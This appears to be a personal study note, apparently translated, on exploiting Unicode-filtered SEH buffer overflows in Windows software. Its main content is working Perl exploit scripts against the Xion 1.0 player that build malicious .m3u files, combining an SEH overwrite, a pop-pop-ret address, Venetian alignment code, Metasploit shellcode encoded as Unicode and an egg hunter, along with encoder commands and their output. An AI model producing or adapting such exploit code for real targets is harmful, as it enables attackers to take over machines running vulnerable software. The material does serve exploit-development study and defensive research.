Unicode conversion automatically inserts NULL bytes.
1) Overwriting the return address
Look for an address of the form 0x00nn00mm that holds a jmp xxx which can jump to the shellcode.
2) SEH-based: control EIP + short jmp
Look for a pop pop ret entry address that contains no bytes > 0x7f and use it to overwrite the SEH handler.
First set nseh to \xcc\xcc, then look for a two-byte short jmp.
3) SEH-based jmp
Instead of a short jmp, overwrite nSEH with harmless code so that execution runs on past the overwritten SEH record,
then place the code to be executed after the overwritten SEH record; after stepping over nseh + seh, our code runs.
This requires:
(1) harmless instructions placed in nseh; (2) a "unicode compatible" address to overwrite the SEH handler, whose execution does no harm.
When an ASCII byte is > 0x7f, the value after Unicode conversion is completely different, e.g. 0x80 -> 1a20, which could be used to build 0x00nn1a20.
ASCII shellcode -> Unicode shellcode:
1) Find an equivalent ASCII copy and jump to it:
Once the ASCII input is loaded into memory it is all converted to Unicode, so look for the ASCII version of the shellcode in memory; if EIP can be made to jump to that address,
the exploit may work. If it cannot be reached directly, control the contents of some register, jump to that register, and place some jump instructions there that jump to the ASCII version of the shellcode.
2) Write your own unicode-compatible shellcode
3) Use an encoder
Convert ASCII -> Unicode and prepend a decoder; after decoding, the original code is produced and executed.
(1) Reconstruct the original code at a specific memory address, then jump to that address
One register must point to the entry of decoder+shellcode, and another register must point to a writable memory address (for the shellcode).
(2) Change the code execution flow so that it runs into the reconstructed shellcode
Only one register pointing to the entry of decoder+shellcode is needed; the reconstructed original shellcode is stored at that same place.
Tools:
1) makeunicode2.py: couldn't work it out.
2) vense.pl, download: http://www.phenoelit-us.org/win
Generates a single-byte string containing decoder + original shellcode. To use the decoder, registers also need to be set up:
1 register points directly at the buffer entry where the shellcode generated by vense.pl is stored; a 2nd register must point at a writable and executable memory address that data can be written into.
shellcode entry address = eax, writable address = edi
Replace $secondstage with Metasploit-generated Perl shellcode; after decoding it executes normally.
Run the script: 1) it shows the original shellcode; 2) the newly generated shellcode, including the decoder.
Put the newly generated shellcode into the exploit and make sure eax -> shellcode entry address!!! Here the registers have to be readjusted, and the jump implemented with unicode-compatible code (method: see the linked post).
Once the registers are set, run jmp eax; the decoder extracts the original shellcode and executes it.
Notes:
(1) It can't be used in a non-Unicode exploit. (2) Although the algorithm used in the script is the version improved by makeunicode2, it still generates very long shellcode, so a large buffer is required.
3) alpha2, download: http://download.csdn.net/detail/hksoobe/4803452
Also included in MSF; it wraps the shellcode inside a decoder.
(1) Only the register pointing to the shellcode entry needs to be specified; no register pointing to a writable/executable address is required.
(2) The decoder is not contained in the original code; the decoder is self-modifying, and the required buffer space is smaller.
Didn't download the one in MSF; not used.
root@bt:~/Desktop# ./alpha2 eax --unicode --uppercase < 1.bin
root@bt:~/Desktop# ./alpha2 --help
Usage: ./alpha2 [OPTION] [BASEADDRESS]
ALPHA 2 encodes your IA-32 shellcode to contain only alphanumeric characters.
The result can optionaly be uppercase-only and/or unicode proof. It is a encoded
version of your origional shellcode. It consists of baseaddress-code with some
padding, a decoder routine and the encoded origional shellcode. This will work
for any target OS. The resulting shellcode needs to have RWE-access to modify
it's own code and decode the origional shellcode in memory.

BASEADDRESS
  The decoder routine needs have it's baseaddress in specified register(s).
  The baseaddress-code copies the baseaddress from the given register or stack
  location into the apropriate registers.
  eax, ecx, edx, ecx, esp, ebp, esi, edi
        Take the baseaddress from the given register.
        (Unicode baseaddress code using esp will overwrite the byte of memory
        pointed to by ebp!)
  [esp], [esp-X], [esp+X]
        Take the baseaddress from the stack.
  seh   The windows "Structured Exception Handler" (seh) can be used to
        calculate the baseaddress automatically on win32 systems. This option
        is not available for unicode-proof shellcodes and the uppercase
        version isn't 100% reliable.
  nops  No baseaddress-code, just padding. If you need to get the baseaddress
        from a source not on the list use this option (combined with
        --nocompress) and replace the nops with your own code. The ascii
        decoder needs the baseaddress in registers ecx and edx, the
        unicode-proof decoder only in ecx.
  -n    Do not output a trailing newline after the shellcode.
  --nocompress
        The baseaddress-code uses "dec"-instructions to lower the required
        padding length. The unicode-proof code will overwrite some bytes in
        front of the shellcode as a result. Use this option if you do not want
        the "dec"-s.
  --unicode
        Make shellcode unicode-proof. This means it will only work when it gets
        converted to unicode (inserting a '0' after each byte) before it gets
        executed.
  --uppercase
        Make shellcode 100% uppercase characters, uses a few more bytes then
        mixedcase shellcodes.
  --sources
        Output a list of BASEADDRESS options for the given combination of
        --uppercase and --unicode.
  --help     Display this help and exit
  --version  Output version information and exit
See the source-files for further details and copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Acknowledgements:
  Thanks to rix for his phrack article on aphanumeric shellcode.
  Thanks to obscou for his phrack article on unicode-proof shellcode.
  Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.
Report bugs to <skylined@edup.tudelft.nl>
4) metasploit
root@bt:/opt/framework/msf3# ./msfpayload windows/exec CMD=calc R |
> ./msfencode -e x86/alpha_mixed -t raw |
> ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl
[*] x86/alpha_mixed succeeded with size 454 (iteration=1)
[*] x86/unicode_upper succeeded with size 1039 (iteration=1)
my $buf =
"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" .
"\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44\x41\x5a" .
"\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51\x41\x49" .
"\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50\x41\x5a\x31\x41" .
... omitted
Constraints:
1) Only a limited instruction set is available.
2) NULL bytes must be avoided; the shellcode must still run correctly after the NULLs are inserted.
3) Machine code alignment problems.
Venetian shellcode technique
Make sure the NULLs and the instructions line up correctly:
single-byte instructions whose Unicode conversion does not corrupt registers or the instruction stream. If that is still unclear, see http://phrack.org/issues/61/11.html#article
Alignment opcodes (the inserted 00 bytes are absorbed as harmless instructions):
00 6e 00: add byte ptr [esi],ch
00 6f 00: add byte ptr [edi],ch
00 70 00: add byte ptr [eax],ch
00 71 00: add byte ptr [ecx],ch
00 72 00: add byte ptr [edx],ch
00 73 00: add byte ptr [ebx],ch
00 62 00: add byte ptr [edx],ah
00 6d 00: add byte ptr [ebp],ch
1) Assume ESI points to a writable address.
Assume the ASCII version of the shellcode is at 0x33445566 and that value has to be written into eax. Perl script:
my $align = "\xb8\x44\xaa";   # mov eax,0x0AA004400
$align=$align."\x6e";         # nop/align nullbytes
$align=$align."\x50";         # push eax
$align=$align."\x6e";         # nop/align nullbytes
$align=$align."\x4c";         # dec esp
$align=$align."\x6e";         # nop/align nullbytes
$align=$align."\x58";         # pop eax, eax=0x004400??
$align=$align."\x6e";         # nop/align nullbytes
$align=$align."\x05\x55\x33"; # add eax,33005500h, eax=0x334455??
$align=$align."\x6e";         # nop/align nullbytes
$align=$align."\xb0";         # mov al,0
# no alignment needed between these 2!
$align=$align."\xb9\x66\xaa"; # mov ecx,AA006600h, eax=0x33445500
$align=$align."\xe8";         # add al,ch, eax=0x33445566
# next comes the jmp eax
$align=$align."\x6e";         # nop/align nullbytes
!!! Note: there is a problem here: 0xc3 does not come out as 0xc3 after Unicode conversion.
So usually we just fall straight through into the shellcode.
But http://bbs.pediy.com/showthread.php?t=126344
says it may be possible to construct a c3:
'\x72\xcb\x72'  # ret; converted to '\x72\x00\xc3\x85\x41\x00'
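Which bytes survive the conversion depends on the ANSI code page the program converts under, and that is what decides whether an address or an alignment opcode is "unicode compatible" in the sense used above, and why a byte such as 0xc3 may not come out as 0xc3 (in a double-byte code page such as cp936, 0xc3 is a lead byte; in cp1252 it is a single character). The script below is an added example, not code from the original post: it simulates the ANSI -> UTF-16LE expansion with Python's codecs; the sample bytes and the choice of cp1252 versus cp936 for comparison are assumptions.

```python
# Added example (not from the original post): simulate the ANSI -> UTF-16LE
# expansion a Windows program applies when it converts byte input to a wide
# string, and check which bytes "survive" as <byte> 00.
from typing import Dict, Optional, Tuple

# Constructed sample inputs: the pop-pop-ret address bytes and the Venetian
# alignment sequence discussed above (push ebp / pop eax with 0x6e padding).
SEH_BYTES = b"\x34\x47"                      # should become 0x00470034 in memory
VENETIAN = b"\x6e\x55\x6e\x58\x6e\x05\x14\x11"


def to_utf16le(data: bytes, codepage: str = "cp1252") -> bytes:
    """Decode with the given ANSI code page, then re-encode as UTF-16LE.

    Bytes <= 0x7f always become <byte> 00. Bytes >= 0x80 go through the code
    page table: in cp1252 they are single characters (0x80 -> U+20AC,
    0xc3 -> U+00C3); in a double-byte code page such as cp936 a byte like 0xc3
    is a lead byte that swallows the following byte. Undecodable input becomes
    U+FFFD, which never looks like the original byte.
    """
    return data.decode(codepage, errors="replace").encode("utf-16-le")


def survives(data: bytes, codepage: str = "cp1252") -> bool:
    """True if every byte of `data` comes out as exactly <byte> 00."""
    expected = b"".join(bytes((b, 0)) for b in data)
    return to_utf16le(data, codepage) == expected


def address_after_expansion(two_bytes: bytes, codepage: str = "cp1252") -> Optional[int]:
    """The 32-bit little-endian value two file bytes turn into in memory
    (how "\\x34\\x47" becomes the handler address 0x00470034), or None if they
    do not expand to exactly four bytes."""
    widened = to_utf16le(two_bytes, codepage)
    if len(widened) != 4:
        return None
    return int.from_bytes(widened, "little")


def report(data: bytes, codepages: Tuple[str, ...] = ("cp1252", "cp936")) -> Dict[str, bool]:
    """Per-code-page survival verdict for one byte string."""
    return {cp: survives(data, cp) for cp in codepages}


if __name__ == "__main__":
    print(hex(address_after_expansion(SEH_BYTES)))   # 0x470034
    print(report(VENETIAN))                          # survives everywhere
    print(report(b"\x80"))                           # never survives
    print(report(b"\xc3"))                           # cp1252 yes, cp936 no
```

The same check applied to an input-handling path shows whether a given byte value can reach memory unchanged at all, which is what a reviewer needs to know before trusting a "no bytes > 0x7f" rule.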
2) Assume ebp+0x100 is to be loaded into eax and then we jump to EAX to execute code; first write the assembly instructions:
00401580 > 55           push ebp
00401581   58           pop eax
00401582   05 00140011  add eax,0x11001400
00401587   2D 00130011  sub eax,0x11001300   ; = EBP+0x100
Build the above code with the Venetian shellcode technique:
\x6e          # nop/align nullbytes
\x55          # push ebp
\x6e          # nop/align nullbytes
\x58          # pop eax
\x6e          # nop/align nullbytes
\x05\x14\x11  # add eax,0x11001400
\x6e          # nop/align nullbytes
\x2d\x13\x11  # sub eax,0x11001300
\x6e          # nop/align nullbytes
An example: Xion 1.0 build 120:
The offset found with OllyDbg is 0x235.
Then:
!pvefindaddr p2
#Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\2 Studios\Xion\Xion.exe
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\2 Studios\Xion\Xion.exe
#Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\2 Studios\Xion\Xion.exe
Bytes > 0x7f can't be used.
0x00470034 is chosen here.
The following one was worked out with WinDbg and doesn't count as a success yet; it had to be debugged before the shellcode would run.
my $file = "test.m3u";
#my $junk = "A"x270;
my $nseh = "\x61\x62"; # 61 is popad, 62 is the align byte
my $seh = "\x34\x47";  # pop pop ret
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\2 Studios\Xion\Xion.exe
my $VenetianShellcode = "\x6e";
$VenetianShellcode = $VenetianShellcode."\x55";          # 55 push ebp
$VenetianShellcode = $VenetianShellcode."\x6e";
$VenetianShellcode = $VenetianShellcode."\x58";          # 58 pop eax
$VenetianShellcode = $VenetianShellcode."\x6e";
$VenetianShellcode = $VenetianShellcode."\x05\x14\x11";  # 05 00140011 add eax,0x11001400
$VenetianShellcode = $VenetianShellcode."\x6e";
$VenetianShellcode = $VenetianShellcode."\x2d\x13\x11";  # 2D 00130011 sub eax,0x11001300 -> EBP+0x100
$VenetianShellcode = $VenetianShellcode."\x6e";
# 229fe54 - 229fd76 = DE = 222, so only 111 are needed; push eax / ret can't be used because c3 is not converted to c3 correctly
#1) "\x43\x6e"  inc ebx, add byte ptr [esi],ch
my $junk2 = "\x70"x111;
#2) "\x70"  jo xxx
# Either 1) or 2) can serve as nop padding so that eax ends up pointing at the first byte of the shellcode
# The buffer from here on is 1840bits, but the shellcode is 1037bits * 2 = 2074, so the shellcode is split into two segments
my $buf = "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" .
"\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44\x41\x5a" .
"\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51\x41\x49" .
"\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50\x41\x5a\x31\x41" .
"\x49\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49" .
"\x41\x58\x41\x35\x38\x41\x41\x50\x41\x5a\x41\x42\x41\x42" .
"\x51\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31\x31" .
"..."; # first segment of the msfencode x86/unicode_upper output, ... omitted
#junk
my $junk = "\x4f\x50\x4b\x51\x55\x50\x45\x52" .
"..."; # second segment of the same shellcode, ... omitted
$junk = $junk."A"x(270-length($junk));
my $junk3 = "\x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf));
my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf.$junk3;
open($FILE,">$file");
print $FILE $payload;
close($FILE);
Encoding your own shellcode into a shellcode usable under Unicode:
root@bt:/opt/framework/msf3# cat exploit.m3u | ./msfencode -e x86/alpha_mixed -t raw | ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl
[*] x86/alpha_mixed succeeded with size 277 (iteration=1)
[*] x86/unicode_upper succeeded with size 685 (iteration=1)
my $buf =
"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" .
... omitted
The following is the correct POC. The question is: the POCs derived with WinDbg and with OD (which works normally) differ; how does that happen?
Moreover, the POC derived with WinDbg is definitely wrong! The one derived with OD is the correct one.
1) Find a Unicode-form pop pop ret to overwrite the SEH handler; !pvefindaddr p2 can find it.
2) In nseh, use popad to obtain register+offset pointing at some position in our input string.
3) Build the VenetianShellcode so that eax = some position in our input string.
4) Build nop/align padding so that eax = the first byte of the shellcode.
5) Use the generated Unicode shellcode; with eax = shellcode start, execute the shellcode (shellcode = decoder + code).
my $file = "test.m3u"; #perl
#my $junk = "A"x270;
my $nseh = "\x61\x62"; # 61 is popad, 62 is the align byte
my $seh = "\x34\x47";  # pop pop ret
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\2 Studios\Xion\Xion.exe
my $VenetianShellcode = "\x6e";
$VenetianShellcode = $VenetianShellcode."\x55";          # 55 push ebp
$VenetianShellcode = $VenetianShellcode."\x6e";
$VenetianShellcode = $VenetianShellcode."\x58";          # 58 pop eax
$VenetianShellcode = $VenetianShellcode."\x6e";
$VenetianShellcode = $VenetianShellcode."\x05\x14\x11";  # 05 00140011 add eax,0x11001400
$VenetianShellcode = $VenetianShellcode."\x6e";
$VenetianShellcode = $VenetianShellcode."\x2d\x13\x11";  # 2D 00130011 sub eax,0x11001300 -> EBP+0x100
$VenetianShellcode = $VenetianShellcode."\x6e";
# 229fe54 - 229fd76 = DE = 222, so only 111 are needed; push eax / ret can't be used because c3 is not converted to c3 correctly
my $junk2 = "\x48\x6e"x42;   #1) "\x43\x6e"  inc ebx, add byte ptr [esi],ch
$junk2 = $junk2."\x70"x6;    #2) "\x70"  jo xxx
# Either 1) or 2) can serve as nop padding so that eax ends up pointing at the first byte of the shellcode
# The buffer from here on is 1840bits, but the shellcode is 1037bits * 2 = 2074, so the shellcode is split into two segments
my $buf = "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" .
"\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44\x41\x5a" .
"\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51\x41\x49" .
"\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50\x41\x5a\x31\x41" .
"\x49\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49" .
"\x41\x58\x41\x35\x38\x41\x41\x50\x41\x5a\x41\x42\x41\x42" .
"..."; # rest of the msfencode x86/unicode_upper output, ... omitted
#junk
$junk = "A"x235;
my $junk3 = "\x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf));
my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf.$junk3;
open($FILE,">$file");
print $FILE $payload;
close($FILE);
Next, build a Unicode version of an egg hunter. Egg hunting solves the case where there isn't enough room for the characters: the shellcode is written somewhere else, and the hunter then searches for it and executes it.
Build the shellcode:
root@xxx:/opt/framework/msf3# ./msfpayload windows/messagebox TEXT="#pand0#" TITLE="#pand0#" R > /root/Desktop/1.bin
root@bt:~/Desktop# ./alpha2 eax --unicode --uppercase < 1.bin
PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1A...
my $file = "test.m3u"; #perl
#my $junk = "A"x270;
my $nseh = "\x61\x62"; # 61 is popad, 62 is the align byte
my $seh = "\x34\x47";  # pop pop ret
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\2 Studios\Xion\Xion.exe
my $VenetianShellcode = "\x6e";
$VenetianShellcode = $VenetianShellcode."\x55";          # 55 push ebp
$VenetianShellcode = $VenetianShellcode."\x6e";
$VenetianShellcode = $VenetianShellcode."\x58";          # 58 pop eax
$VenetianShellcode = $VenetianShellcode."\x6e";
$VenetianShellcode = $VenetianShellcode."\x05\x14\x11";  # 05 00140011 add eax,0x11001400
$VenetianShellcode = $VenetianShellcode."\x6e";
$VenetianShellcode = $VenetianShellcode."\x2d\x13\x11";  # 2D 00130011 sub eax,0x11001300 -> EBP+0x100
$VenetianShellcode = $VenetianShellcode."\x6e";
# 229fe54 - 229fd76 = DE = 222, so only 111 are needed; push eax / ret can't be used because c3 is not converted to c3 correctly
my $junk2 = "\x48\x6e"x42;   #1) "\x43\x6e"  inc ebx, add byte ptr [esi],ch
$junk2 = $junk2."\x70"x6;    #2) "\x70"  jo xxx
# Either 1) or 2) can serve as nop padding so that eax ends up pointing at the first byte of the shellcode
# The buffer from here on is 1840bits, but the shellcode is 1037bits * 2 = 2074, so the shellcode is split into two segments
my $egghunter = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBQVU1XJKOLOQ2R2QZLB0X8MNNOLM5QJ44JO6XM0P0KPT44KKJ6O45IZFO3EJGKOIWA"; # the egg is \x00\x30\x00\x74
$junk2 = $junk2.$egghunter;
my $garbage = "X"x100;
######################################################### garbage code ############################################
my $aligin = "\x6d".
"\x57".          # push edi
"\x6d".
"\x58".          # pop eax
"\x6d".
"\x05\x14\x11".  # 05 00140011 add eax,0x11001400
"\x6d".
"\x2d\x13\x11".  # 2D 00130011 sub eax,0x11001300 -> eax+0x100
"\x6d".
"\x40".          # inc eax
"\x6d".
"\x70"x113;      # note: the difference obtained from the add/sub has to be divided by 2
my $buf = "..."; #panda0#  (the alpha2 --unicode --uppercase output from above goes here)
$junk = "A"x235;
my $junk3 = "\x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$garbage."0t0t".$aligin.$buf));
my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$garbage."0t0t".$aligin.$buf.$junk3;
open($FILE,">$file");
print $FILE $payload;
close($FILE);